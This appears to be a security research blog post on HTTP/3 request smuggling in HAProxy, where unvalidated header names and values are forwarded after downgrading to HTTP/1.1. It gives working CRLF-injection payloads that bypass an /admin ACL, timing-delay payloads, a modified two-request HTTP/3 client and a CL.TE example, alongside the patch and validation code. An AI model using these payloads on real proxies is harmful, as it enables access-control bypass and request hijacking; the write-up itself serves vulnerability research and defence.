Introduction

HTTP request smuggling is a well-known web vulnerability that occurs when an attacker sends a request that two or more web servers or reverse proxies interpret differently. This blog post shows how HTTP request smuggling can be achieved through an incorrect implementation of the HTTP/3 RFC in HAProxy, and how different web proxies handle the resulting malformed requests. It continues the previous research on CVE-2023-25950 (HTTP3ONSTEROIDS) and CVE-2024-53008.

Executive Summary

This research reveals a vulnerability in HAProxy's HTTP/3 implementation that enables HTTP request smuggling through malformed HTTP headers. HAProxy does not correctly validate header names and values received over HTTP/3, so malformed headers are forwarded to backend servers. As a result, an attacker can smuggle unauthorized HTTP requests, bypass HAProxy's access controls (such as ACL restrictions on sensitive routes like /admin), and trigger unintended behavior in downstream servers and applications.

The vulnerability was demonstrated in a lab environment with HAProxy fronting various reverse proxies (NGINX, Apache, Varnish, Squid, Caddy) and a backend application, showing how different servers interpret malformed headers inconsistently when HAProxy downgrades the HTTP/3 request to HTTP/1.1. Some servers reject the smuggled requests, while others accept and process them, amplifying the risk. To exploit this flaw over HTTP/3, a minimal HTTP/3 client was modified to keep the QUIC connection open and send multiple requests on it, allowing smuggled requests to be executed and their responses to be received.



HTTP/2 vs HTTP/3 and the Role of QUIC in Smuggling Attacks

To fully understand why this HAProxy HTTP/3 flaw is so dangerous, it's worth stepping back to see how HTTP/2 and HTTP/3 differ under the hood, and why these differences open new territory for request smuggling.

At a glance, HTTP/2 and HTTP/3 both move away from the slow, blocking behavior of HTTP/1.1 by introducing multiplexed streams and binary framing. But HTTP/3 fundamentally changes the transport layer: it abandons TCP entirely in favor of QUIC, a protocol built on top of UDP. This shift doesn't just improve speed; it rewrites the rules for how connections behave, how intermediaries see traffic, and how malformed requests can slip through.

| Feature | HTTP/2 | HTTP/3 |
|---|---|---|
| Transport Layer | TCP | QUIC (over UDP) |
| Handshake | TLS over TCP (separate handshake) | QUIC integrates TLS 1.3 handshake into transport |
| Multiplexing | Yes, over TCP (subject to head-of-line blocking) | Yes, independent streams prevent head-of-line blocking |
| Connection Migration | No | Yes, QUIC supports migration between IPs |
| Header Compression | HPACK | QPACK |
| Encryption | TLS 1.2+ | TLS 1.3 only |
| Downgrading to HTTP/1.1 | Yes, if backend does not support H2 | Yes, if backend does not support H3 |
| Middlebox Handling | TCP-friendly, easier to inspect | Encrypted transport headers, requires QUIC termination |
| RFC Specification | RFC 9113 | RFC 9114 |

Under HTTP/2, the transport is still TCP. A client connects over TLS (usually negotiating h2 via ALPN), and the connection carries multiple logical streams, each made up of frames. Frames from different streams are interleaved on the connection while TCP still delivers the underlying byte stream in order. Reverse proxies like HAProxy, NGINX, or Apache parse the HTTP/2 frames, translate them into HTTP/1.1 (when downgrading), and send them downstream. This downgrade step is a familiar smuggling vector: if the frontend and backend parse headers differently after translation, inconsistencies emerge.

HTTP/3 keeps the binary framing and multiplexing but swaps TCP for QUIC. QUIC runs over UDP, encrypts every packet, and delivers each stream independently. This independence means that packet loss on one stream doesn't block the others (no head-of-line blocking), but it also means intermediaries can handle streams in subtly different ways. QUIC integrates the TLS 1.3 handshake into its own transport handshake and uses connection IDs and its own packet numbering, which makes connections far more resilient: they can migrate between IP addresses without breaking. From a security perspective, however, QUIC's transport-layer encryption means middleboxes and proxies have to terminate QUIC to see the HTTP/3 layer at all, which adds complexity and parsing edge cases.
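Every HTTP/3 request travels on its own QUIC stream, and RFC 9000 (Section 2.1) encodes who opened a stream and whether it is bidirectional in the two lowest bits of its stream ID. The sketch below decodes those bits; the helper names are illustrative and not taken from any QUIC library. It shows why consecutive requests on one connection typically use stream IDs 0, 4, 8, and so on, which matches curl reporting "stream 0" for a first request.

```python
def classify_stream_id(stream_id: int) -> tuple[str, str]:
    """Decode the two least-significant bits of a QUIC stream ID (RFC 9000, Section 2.1)."""
    if stream_id < 0:
        raise ValueError("QUIC stream IDs are non-negative integers")
    # Bit 0x1: who opened the stream (0 = client, 1 = server).
    initiator = "server" if stream_id & 0x1 else "client"
    # Bit 0x2: direction (0 = bidirectional, 1 = unidirectional).
    direction = "unidirectional" if stream_id & 0x2 else "bidirectional"
    return initiator, direction


def request_stream_ids(count: int) -> list[int]:
    """IDs of the first `count` client-initiated bidirectional streams (0, 4, 8, ...)."""
    return [4 * n for n in range(count)]


for sid in request_stream_ids(2):
    print(sid, classify_stream_id(sid))  # 0 and 4, both ('client', 'bidirectional')
```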

Here's the architectural difference in a nutshell:

HTTP/2: Client --TCP/TLS--> Proxy --TCP/TLS--> Backend

HTTP/3: Client --UDP/QUIC/TLS--> Proxy --TCP/TLS--> Backend

The switch from QUIC to TCP at the proxy introduces a translation step, just like HTTP/2 downgrades, but with even more room for mistakes. Every HTTP/3 request that a proxy forwards to a backend that only speaks HTTP/1.1 or HTTP/2 must be re-encoded. In vulnerable HAProxy versions, this re-encoding allowed malformed HTTP/3 headers to slip past validation and reappear intact on the backend side as HTTP/1.1 headers that would never survive a normal HTTP/1.1 or HTTP/2 connection made directly by the client.

What makes this particularly ripe for smuggling is the mismatch in parsing rules. RFC 9114 carries over most of HTTP/2's pseudo-header and lowercase-name requirements, and any deviation, such as an embedded CRLF in a name or value, makes the message malformed and must be treated as a stream error. If the frontend ignores this and simply passes the malformed header downstream after the downgrade, the backend might happily parse part of it as a separate HTTP/1.1 request. This is the crux: QUIC changes the wire-level reality, and the extra translation layer gives attackers another opportunity to craft payloads that look harmless in HTTP/3 but become lethal when interpreted as HTTP/1.1.
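The downgrade problem can be reproduced in a few lines. The sketch below is a deliberately naive HTTP/3-to-HTTP/1.1 serializer that copies decoded field names and values verbatim, which is the failure mode described above. It is not HAProxy code (HAProxy converts through its own internal representation); `naive_downgrade` and the example field list are hypothetical. Feeding it a value that contains CRLF CRLF yields a byte stream that an HTTP/1.1 parser reads as two requests.

```python
def naive_downgrade(method: str, path: str, authority: str,
                    fields: list[tuple[str, str]]) -> bytes:
    """Serialize decoded HTTP/3 fields as HTTP/1.1 WITHOUT validating them.

    Names and values are copied verbatim, so a CR LF inside either one ends
    the header line early and can start a new request on the backend side.
    """
    lines = [f"{method} {path} HTTP/1.1", f"host: {authority}"]
    lines += [f"{name}: {value}" for name, value in fields]
    # Lines are CRLF-separated; the trailing CRLF CRLF ends the last line and the header block.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


wire = naive_downgrade(
    "GET", "/", "lab.local",
    [("foo", "bar\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo")],  # header-value payload
)
for part in wire.split(b"\r\n\r\n"):
    print(part)
```

The second printed part is a complete `GET /admin` request head that the frontend never treated as a request.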

During testing, these differences became crystal clear. A header that HAProxy should have rejected under HTTP/3 because of invalid characters sailed through to downstream proxies once the QUIC traffic was downgraded to HTTP/1.1. The backend's parser, unaware of the header's HTTP/3 origins, treated it as perfectly valid input. That gap between what should happen per the RFC and what actually happens in real implementations is exactly what smuggling thrives on.

| Feature / Behavior | Risk in HTTP/2 | Risk in HTTP/3 |
|---|---|---|
| Downgrade Translation | Can cause parsing inconsistencies between H2 and HTTP/1.1 | Same risk, plus QUIC → TCP translation adds extra parsing layer |
| Header Validation | RFC requires strict lowercase names; vulnerable if proxies skip checks | Same rule, but some implementations (e.g., HAProxy vuln) fail to reject malformed names |
| Multiplexing Streams | Smuggled request in one stream may affect another | Stream isolation in QUIC mitigates HoL blocking but not smuggling risks |
| Middlebox/Proxy Termination | TCP-based parsing is mature, but still prone to TE/CL attacks | QUIC termination is newer and more error-prone, increasing likelihood of implementation flaws |
| Connection Migration | Not applicable | Attack surface for hijacking/misrouting if state tracking flawed |
| Compression (HPACK/QPACK) | HPACK vulnerabilities (e.g., BREACH-like attacks) possible | QPACK has similar risks if decompression context manipulated |
| Lack of Visibility | TCP allows some packet inspection even without termination | QUIC encrypts more metadata, making detection of malformed patterns harder |

The takeaway is that HTTP/3's QUIC transport doesn't magically fix smuggling risks. In fact, by adding another translation point and a more complex connection model, it creates fresh ground for these attacks, especially when intermediaries fail to enforce the strict header rules that HTTP/3 demands.

Understanding HTTP Request Smuggling

Before we dive into the specifics of HTTP/3 and HAProxy, let's briefly explain what HTTP request smuggling is. In essence, it exploits discrepancies in how different servers interpret HTTP requests, allowing an attacker to "smuggle" one or more additional requests inside a single request. For example, if a client sends a request with two different Content-Length headers, one server might interpret it as a single request while another sees it as two separate requests. Another example is a frontend server that fails to reject a malformed header name or value and passes it on to the next reverse proxy or backend server. There are many types of HTTP request smuggling attacks, and all of them rely on different servers interpreting the same request differently.

Until now, known HTTP request smuggling attacks have been documented against HTTP/1.1 and HTTP/2. On HTTP/1.1, the classic variants are:

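- CL.TE: the frontend uses the Content-Length header, the backend uses Transfer-Encoding

- TE.CL: the frontend uses Transfer-Encoding, the backend uses Content-Length

- CL.CL: two Content-Length headers with conflicting values

- TE.TE: both servers support Transfer-Encoding, but one of them can be induced to ignore it, for example through a duplicated or obfuscated Transfer-Encoding header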
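The CL.TE case can be modeled offline. In this sketch (all helper names are hypothetical, and chunk extensions and trailers are ignored), the frontend delimits the body with Content-Length and forwards all of it, while the backend decodes the same bytes as chunked data and leaves whatever follows the terminating zero-size chunk in its buffer, where it becomes the start of the next request. Computing Content-Length from the body avoids hand-counting mistakes.

```python
def build_cl_te(smuggled_prefix: bytes) -> bytes:
    """Build a CL.TE request: Content-Length covers the whole body,
    while the chunked encoding ends before the smuggled prefix."""
    body = b"b\r\nq=smuggling\r\n0\r\n\r\n" + smuggled_prefix  # 0xb = 11 bytes of chunk data
    head = (
        b"POST /smuggled HTTP/1.1\r\n"
        b"Host: example.com\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        + b"Transfer-Encoding: chunked\r\n\r\n"
    )
    return head + body


def parse_headers(raw: bytes) -> tuple[dict[str, str], bytes]:
    """Split a raw request into lowercased headers and everything after the blank line."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers[name.decode().strip().lower()] = value.decode().strip()
    return headers, rest


def frontend_body(raw: bytes) -> bytes:
    """Frontend view: the body is exactly Content-Length bytes, all forwarded."""
    headers, rest = parse_headers(raw)
    return rest[: int(headers["content-length"])]


def backend_leftover(body: bytes) -> bytes:
    """Backend view: decode chunked data and return the bytes after the last chunk."""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            return body[pos + 2:]  # skip the CRLF that ends the (empty) trailer section
        pos += size + 2  # chunk data plus its trailing CRLF


request = build_cl_te(b"GET /admin HTTP/1.1\r\nExample: x")
forwarded = frontend_body(request)
print(len(forwarded))               # 52
print(backend_leftover(forwarded))  # b'GET /admin HTTP/1.1\r\nExample: x'
```

The leftover bytes end in an unterminated header line (`Example: x`), so the next request arriving on the backend connection is appended to the smuggled one.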

Below is an example of a raw CL.TE request:

POST /smuggled HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Transfer-Encoding: chunked

b
q=smuggling
0

GET /admin HTTP/1.1
Example: x

On HTTP/2:

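- H2.CL: an HTTP/2 request carries a Content-Length header that disagrees with the actual body length, and the backend trusts it after the downgrade

- H2.TE: an HTTP/2 request carries a Transfer-Encoding header, which HTTP/2 prohibits, and the frontend keeps it when downgrading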

HTTP/2 downgrading is an interesting behavior between the frontend and the next reverse proxies. When the backend server only supports HTTP/1.1 but clients connect to the frontend over HTTP/2, the frontend rewrites each request as HTTP/1.1 and sends it to the next reverse proxy or backend server. The same behavior is observed in HAProxy's HTTP/3 implementation, where the frontend downgrades HTTP/3 requests to HTTP/1.1.



Lab Setup & Architecture

To demonstrate the HTTP request smuggling vulnerability, we set up an environment with HAProxy configured to handle HTTP/3 requests. The environment includes HAProxy as the first reverse proxy, followed by several reverse proxies (NGINX, Apache, Varnish, Squid, and Caddy), and finally a backend application written in Flask. The goal is to exploit the differences in how these servers interpret malformed HTTP headers.

The lab environment can be found in the lab directory of the previous research repository.



The backend application captures every request it receives and stores it in a file called requests.log. This file is used to verify whether the request smuggling succeeded, i.e., whether the backend application actually received the smuggled request.
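The lab backend is a Flask application that isn't reproduced here. As a stand-in, and purely as an assumption, the sketch below implements the same idea as a plain WSGI app from the standard library (Flask applications are WSGI applications too): every request is appended to requests.log as one JSON line, and /admin returns a placeholder message. The route text and log format are hypothetical.

```python
import json

LOG_PATH = "requests.log"  # same file name the lab backend writes to


def app(environ, start_response):
    """Minimal WSGI backend: append every received request to LOG_PATH, then answer it."""
    # WSGI exposes request headers as HTTP_* keys; turn them back into header names.
    headers = {
        key[5:].replace("_", "-").title(): value
        for key, value in environ.items()
        if key.startswith("HTTP_")
    }
    entry = {
        "method": environ.get("REQUEST_METHOD", "GET"),
        "path": environ.get("PATH_INFO", "/"),
        "headers": headers,
    }
    with open(LOG_PATH, "a", encoding="utf-8") as log:
        log.write(json.dumps(entry) + "\n")

    if entry["path"] == "/admin":
        body = b"Hello, Admin! This is a protected route.\n"  # hypothetical route text
    else:
        body = b"OK\n"
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Content-Length", str(len(body)))])
    return [body]
```

For a local lab, `wsgiref.simple_server.make_server("0.0.0.0", 5000, app).serve_forever()` is enough to serve it; the port is arbitrary.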

HAProxy configuration is set to block access to the /admin route.

frontend haproxy
    acl forbidden_path path -i /admin
    http-request deny if forbidden_path
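The ACL can be approximated in Python to make its scope explicit. This is a simplified model, not HAProxy's matcher: the `path` sample takes the request path without the query string, and `-i` makes the string comparison case-insensitive. The point is that the rule only ever sees the path HAProxy itself parsed, so a request line hidden inside a header value is never evaluated. `acl_denies` is a hypothetical name.

```python
FORBIDDEN_PATHS = {"/admin"}  # mirrors: acl forbidden_path path -i /admin


def acl_denies(request_target: str) -> bool:
    """Rough model of `path -i /admin`: exact, case-insensitive match on the path.

    The `path` sample stops before the query string, so "/admin?x=1" is denied too.
    """
    path = request_target.split("?", 1)[0]
    return path.lower() in FORBIDDEN_PATHS


# Only the path HAProxy parsed from the request is checked. A payload such as
# "bar\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo" inside a header value never reaches the ACL.
print(acl_denies("/admin"))  # True
print(acl_denies("/"))       # False
```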

Testing the lab environment and the ACL restriction in HAProxy:

$ python3 minimal_http3_client.py https://lab.local/admin --debug
:status: 403
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

HTTP/3 Client Limitations and Tooling Alternatives

Since Burp Suite does not support HTTP/3, this blog post uses a minimal HTTP/3 client written in Python to send HTTP/3 requests. The client makes it possible to send malformed header names and values.

The client works by sending a single HTTP/3 request, waiting for the response, and then closing the QUIC connection. This is a problem for HTTP request smuggling, since we need to keep the QUIC connection open and send a second request to receive the smuggled request's response.

The client was not designed to handle multiple requests on the same QUIC connection, so we had to modify it to support this. The modified client is available in http3_client_2r.py.

Below is a snippet of the modified client that sends two requests over the same QUIC connection:

import asyncio

# <snippet>

async def run_requests(url: str, debug: bool = False):
    # <snippet>
    request_headers = {
        "fooo": "bar",  # --> malformed headers go here
    }

    # First request, sent to the path of the target URL
    data1, headers1 = await asyncio.wait_for(
        client.send_http_request(
            parsed_url.path or "/",
            request_method="GET",
            request_headers=request_headers,
        ),
        timeout=Config.DEFAULT_TIMEOUT,
    )
    print("=" * 80)
    print("First request response:")
    for k, v in headers1.items():
        print(f"{k}: {v}")
    print("Data response:")
    print(data1.decode())

    # Second request to /404 over the same QUIC connection
    data2, headers2 = await asyncio.wait_for(
        client.send_http_request("/404", request_method="GET"),
        timeout=Config.DEFAULT_TIMEOUT,
    )
    print("=" * 80)
    print("Second request to /404 response:")
    for k, v in headers2.items():
        print(f"{k}: {v}")
    print("Data response:")
    print(data2.decode())
    # <snippet>

With this modification, we were able to send two requests and observe the responses and behavior of the servers.

Background & Patch

HAProxy is a popular open-source load balancer and reverse proxy server that supports HTTP/3. However, its implementation of HTTP/3 in some versions has some quirks that can lead to unexpected behavior, especially when it comes to handling HTTP headers.

Based on the previous research, the HTTP/3 implementation in HAProxy has a bug that allows malformed header names and values to be forwarded to the next reverse proxy or backend server instead of being rejected with a stream reset. Example request and response:

$ curl --http3 -H "foooooo\r\n: barr" -iL -k https://foo.bar/
HTTP/3 200
server: foo.bar
date: foo
content-type: text/html; charset=utf-8
content-length: 76
alt-svc: h3=":443";ma=900;

Host: foo.bar
User-Agent: curl/8.1.2-DEV
Accept: */*
Foooooo\R\N: barr <-- Malformed header

As shown, the malformed header name foooooo\r\n (which curl sends as literal backslash characters, themselves invalid in a field name) is accepted and passed through instead of being rejected, and it appears in the echoed request as Foooooo\R\N. This behavior violates the HTTP/3 RFC, which requires intermediaries not to forward malformed requests and to treat them as a stream error, so the expected result is a reset stream, e.g.:

curl: (56) HTTP/3 stream 0 reset by server

At the time of the initial investigation into the CVE, the HAProxy team had already released a patch addressing the issue. The patch ensures that malformed headers are properly rejected and that the stream is reset, preventing any further processing of the request.

--- a/src/h3.c
+++ b/src/h3.c
@@ -352,7 +352,27 @@ static ssize_t h3_headers_to_htx(struct qcs *qcs, const struct buffer *buf,
 	//struct ist scheme = IST_NULL, authority = IST_NULL;
 	struct ist authority = IST_NULL;
 	int hdr_idx, ret;
-	int cookie = -1, last_cookie = -1;
+	int cookie = -1, last_cookie = -1, i;
+
+	/* RFC 9114 4.1.2. Malformed Requests and Responses
+	 *
+	 * A malformed request or response is one that is an otherwise valid
+	 * sequence of frames but is invalid due to:
+	 * - the presence of prohibited fields or pseudo-header fields,
+	 * - the absence of mandatory pseudo-header fields,
+	 * - invalid values for pseudo-header fields,
+	 * - pseudo-header fields after fields,
+	 * - an invalid sequence of HTTP messages,
+	 * - the inclusion of uppercase field names, or
+	 * - the inclusion of invalid characters in field names or values.
+	 *
+	 * [...]
+	 *
+	 * Intermediaries that process HTTP requests or responses (i.e., any
+	 * intermediary not acting as a tunnel) MUST NOT forward a malformed
+	 * request or response. Malformed requests or responses that are
+	 * detected MUST be treated as a stream error of type H3_MESSAGE_ERROR.
+	 */
 	TRACE_ENTER(H3_EV_RX_FRAME|H3_EV_RX_HDR, qcs->qcc->conn, qcs);
@@ -416,6 +436,14 @@ static ssize_t h3_headers_to_htx(struct qcs *qcs, const struct buffer *buf,
 		if (isteq(list[hdr_idx].n, ist("")))
 			break;
 
+		for (i = 0; i < list[hdr_idx].n.len; ++i) {
+			const char c = list[hdr_idx].n.ptr[i];
+			if ((uint8_t)(c - 'A') < 'Z' - 'A' || !HTTP_IS_TOKEN(c)) {
+				TRACE_ERROR("invalid characters in field name", H3_EV_RX_FRAME|H3_EV_RX_HDR, qcs->qcc->conn, qcs);
+				return -1;
+			}
+		}
+
 		if (isteq(list[hdr_idx].n, ist("cookie"))) {
 			http_cookie_register(list, hdr_idx, &cookie, &last_cookie);
 			continue;

Repositories - haproxy-2.7.git/commit

In the snippet above, the HAProxy team added a check to ensure that header names contain no uppercase characters and consist only of valid HTTP token characters. If a header name contains an uppercase or otherwise invalid character, the request is rejected and a stream error is raised.
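The name check from the patch, plus the value check that RFC 9114 (Section 10.3) calls for on CR, LF, and NUL, can be sketched as follows. This is an illustrative Python model, not HAProxy code; pseudo-header fields such as `:path` are assumed to be handled separately, and the function names are hypothetical. A malformed message maps to H3_MESSAGE_ERROR, which RFC 9114 (Section 8.1) assigns the code 0x010e. One detail worth noting: as quoted, `(uint8_t)(c - 'A') < 'Z' - 'A'` has an exclusive upper bound, so for `c == 'Z'` it compares 25 < 25, and since 'Z' is also a valid token character that line alone does not reject it. The sketch uses an inclusive range.

```python
import string
from typing import Optional

# RFC 9110 "tchar": the characters allowed in a field name (token).
TCHAR = set("!#$%&'*+-.^_`|~" + string.digits + string.ascii_letters)
H3_MESSAGE_ERROR = 0x010E  # RFC 9114, Section 8.1


def field_name_error(name: str) -> Optional[str]:
    """Return why a regular (non-pseudo) HTTP/3 field name is malformed, or None."""
    if not name:
        return "empty field name"
    for c in name:
        if "A" <= c <= "Z":  # inclusive range: 'Z' is rejected too
            return f"uppercase character {c!r}"
        if c not in TCHAR:
            return f"invalid character {c!r}"
    return None


def field_value_error(value: str) -> Optional[str]:
    """RFC 9114, Section 10.3 singles out CR, LF and NUL in field values."""
    for c in value:
        if c in "\r\n\x00":
            return f"forbidden character {c!r} in field value"
    return None


def check_fields(fields: list[tuple[str, str]]) -> tuple[Optional[int], Optional[str]]:
    """Return (None, None) if every field is valid, else (H3_MESSAGE_ERROR, reason)."""
    for name, value in fields:
        reason = field_name_error(name) or field_value_error(value)
        if reason:
            return H3_MESSAGE_ERROR, f"{name!r}: {reason}"
    return None, None


payload = [("foo", "bar\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo")]
print(check_fields(payload)[0] == H3_MESSAGE_ERROR)  # True: the stream must be reset
```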

While reproducing the issue and building a proof of concept, the advisory description proved helpful, as it clearly outlines the nature of the vulnerability: HAProxy's HTTP/3 implementation fails to block a malformed HTTP header field name, and when deployed in front of a server that incorrectly processes this malformed header, it may be used to conduct an HTTP request/response smuggling attack. A remote attacker may alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition.

Playground: Smuggling Requests



With the modified client ready, we can begin sending requests and observing how the servers respond. The first goal is to evaluate how HAProxy handles malformed headers, followed by how downstream reverse proxies interpret them.

The approach is simple: construct a request with a malformed header name containing a CRLF sequence followed by a raw smuggled HTTP request.

"\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo\r\n\r\na":"bar"

This request contains CRLF sequences in the header name, which RFC 9114 does not allow. However, HAProxy accepts it and passes it to the next reverse proxy or backend server. Let's look at how different reverse proxies handle this request.

| Reverse Proxy | Interpreted as request | Response Status |

|---|---|---|

| NGINX | Yes | 400 Bad Request |

| Apache | Yes | 400 Bad Request |

| Varnish | Yes | 400 Bad Request |



| Squid | Yes | 200 OK |

| Caddy | No | - |



The table above summarizes how each reverse proxy behaves when it receives a request with a malformed header name. NGINX, Apache, and Varnish parse the smuggled bytes as a separate request but reject it with 400 Bad Request, while Squid processes it and returns 200 OK. Caddy does not interpret it as a request and returns no response. The 400 Bad Request responses occur because the HTTP version in the smuggled request line arrives in lowercase (http/1.1), which is not valid per the specification; the outcome depends on how each reverse proxy handles the HTTP version.

Here’s a request with a malformed header name that Squid accepted and processed successfully:

In contrast, the following request results in a 400 Bad Request response from Varnish due to the malformed header:

During testing, various encodings were tried to keep the HTTP version in uppercase, such as "\u0048\u0054\u0054\u0050" and "\x48\x54\x54\x50", but HAProxy still converted the header names to lowercase.
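The lowercasing is consistent with the 400 responses. This sketch (the function name is hypothetical) lowercases the name payload the way HTTP/3 field names must be sent and extracts the first line a downstream HTTP/1.1 parser would read from it. The method comes out lowercased as well, and both the method and the HTTP-version token are case-sensitive in HTTP/1.1. It also shows why the escape sequences could not help: in the client's Python source, "\u0048\u0054\u0054\u0050" is simply the string "HTTP", so it is lowercased like any other text.

```python
NAME_PAYLOAD = "\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo\r\n\r\na"


def first_request_line(field_name: str) -> str:
    """Lowercase a field name as HTTP/3 requires, then return the first
    non-empty line a downstream HTTP/1.1 parser would see inside it."""
    for line in field_name.lower().split("\r\n"):
        if line:
            return line
    return ""


line = first_request_line(NAME_PAYLOAD)
method, target, version = line.split(" ")
print(line)                                   # get /admin http/1.1
print(version == "HTTP/1.1")                  # False: HTTP-version is case-sensitive
print("\u0048\u0054\u0054\u0050" == "HTTP")   # True: the escapes are just "HTTP"
```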

What about a payload stored in the header value?

"foo":"bar\r\n\r\nGET /admin HTTP/1.1\r\nHost: foo"

NGINX, Apache, Varnish, and Squid all interpret the smuggled request as valid and return 200 OK. Caddy does not interpret it as a request and returns no response.

| Reverse Proxy | Interpreted as request | Response Status |
|---|---|---|
| NGINX | Yes | 200 OK |
| Apache | Yes | 200 OK |
| Varnish | Yes | 200 OK |
| Squid | Yes | 200 OK |
| Caddy | No | - |

This is a significant difference from the previous request with a malformed header name. The payload stored in the header value is accepted and processed by every reverse proxy except Caddy, allowing the smuggled request to be executed.
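To see why every proxy except Caddy ends up with two requests, the sketch below splits a keep-alive HTTP/1.1 byte stream into requests and returns their request lines. The `DOWNSTREAM` bytes are an assumption of what a naive downgrade of the header-value payload looks like (the host value is hypothetical), and the parser only understands Content-Length bodies; it is a teaching model, not how any of the tested proxies is implemented.

```python
# Assumed bytes reaching the next proxy after a naive downgrade of the
# header-value payload (the host value is hypothetical).
DOWNSTREAM = (
    b"GET / HTTP/1.1\r\n"
    b"host: lab.local\r\n"
    b"foo: bar\r\n"
    b"\r\n"                     # injected by the header value: outer request ends here
    b"GET /admin HTTP/1.1\r\n"  # injected by the header value
    b"Host: foo\r\n"
    b"\r\n"                     # the proxy's own end of the header block
)


def request_lines(stream: bytes) -> list[str]:
    """Split a keep-alive HTTP/1.1 byte stream and return each request line.

    Simplified model: bodies are delimited by Content-Length only.
    """
    found = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete head: a real server would wait for more bytes
        request_line, *fields = head.decode("latin-1").split("\r\n")
        length = 0
        for field in fields:
            name, _, value = field.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        found.append(request_line)
        stream = rest[length:]
    return found


print(request_lines(DOWNSTREAM))  # ['GET / HTTP/1.1', 'GET /admin HTTP/1.1']
```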

As we can see in the screenshot, NGINX returns a 200 status code and the requests.log file in the backend application shows that the request was successfully smuggled and the backend application received the request to the /admin route.

Other payloads can confirm successful request smuggling by causing a measurable delay on the smuggled request.

The following payload causes a delay by declaring Transfer-Encoding: chunked with a chunk size (0x9999) far larger than the data that follows:

"foo":"bar \r\n\r\nPOST /delay HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\n9999\r\n"

The following payload causes a delay using Content-Length:

"foo":"bar \r\n\r\nPOST /delay HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 6\r\n\r\n"

Example screenshot:

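The delay payloads work because the backend is left waiting for body bytes that never fully arrive. The sketch below (a simplified model; `pending_body_bytes` is a hypothetical name) computes how much body the smuggled request still expects from its own headers. The constants hold only the part of each payload after `bar \r\n\r\n`, and the sketch ignores the bytes the proxy appends after the header value, such as the rest of the header block. Chunk sizes are hexadecimal, so 0x9999 is 39,321 bytes.

```python
TE_DELAY = (
    "POST /delay HTTP/1.1\r\nHost: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Transfer-Encoding: chunked\r\n\r\n9999\r\n"
)
CL_DELAY = (
    "POST /delay HTTP/1.1\r\nHost: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 6\r\n\r\n"
)


def pending_body_bytes(smuggled: str) -> int:
    """Body bytes the smuggled request still expects, judging by its own headers only."""
    head, _, body = smuggled.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        first_size = body.split("\r\n", 1)[0]
        return int(first_size, 16)  # hex chunk size; none of its data has been sent
    return int(headers.get("content-length", "0")) - len(body)


print(pending_body_bytes(TE_DELAY))  # 39321
print(pending_body_bytes(CL_DELAY))  # 6
```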
Bypassing ACL restriction



What about the /admin route? So far, we've successfully smuggled a request to /admin but without receiving its response. As mentioned earlier, to retrieve the response to a smuggled request over HTTP/3, the QUIC connection must remain open and a second request must be sent over the same connection.

During initial testing, before implementing the modified client, I noticed that every attempt to get a smuggled response back to the client failed. At that point, I took a step back to reflect on why the response wasn’t being returned.

The answer turned out to be simple: the QUIC connection used by the first request was already closed. Without that connection remaining open, there was no channel for the backend server to send the response through. It seems the server requires the same QUIC connection to return the smuggled response.

Still, there was no response from the smuggled request. After some testing, I found that adding two Content-Length headers with conflicting values to the smuggled request made it possible to retrieve its response, presumably because the servers process the conflicting headers inconsistently.
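One possible reading of this result, offered as an assumption rather than a verified trace: if the backend honors `Content-Length: 40`, the smuggled /admin request stays incomplete until 40 more bytes arrive, and those bytes come from the next request forwarded on the same backend connection (here, the client's second request). The /admin response would then be produced while the proxy is waiting for the response to that second request. The sketch keeps only the `Content-Length: 40` field from the payload; `parse_one` and the second request's bytes are hypothetical.

```python
def parse_one(stream: bytes):
    """Parse one HTTP/1.1 request from a backend connection buffer.

    Returns (request_line, body, remaining_bytes), or None while the request
    is incomplete, i.e. while the server would keep waiting for more data.
    Only Content-Length bodies are modeled.
    """
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        return None
    request_line, *fields = head.decode("latin-1").split("\r\n")
    length = 0
    for field in fields:
        name, _, value = field.partition(":")
        if name.strip().lower() == "content-length":
            length = int(value.strip())
    if len(rest) < length:
        return None  # body incomplete: keep waiting
    return request_line, rest[:length], rest[length:]


# Smuggled request, keeping only the Content-Length: 40 field from the payload.
smuggled = (b"GET /admin HTTP/1.1\r\nHost: localhost\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 40\r\n\r\n")
# Hypothetical next request forwarded on the same backend connection.
second = b"GET /404 HTTP/1.1\r\nhost: lab.local\r\nuser-agent: client\r\n\r\n"

print(parse_one(smuggled))  # None: /admin still waits for 40 body bytes
line, body, rest = parse_one(smuggled + second)
print(line)                                      # GET /admin HTTP/1.1
print(body == second[:40], rest == second[40:])  # True True
```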



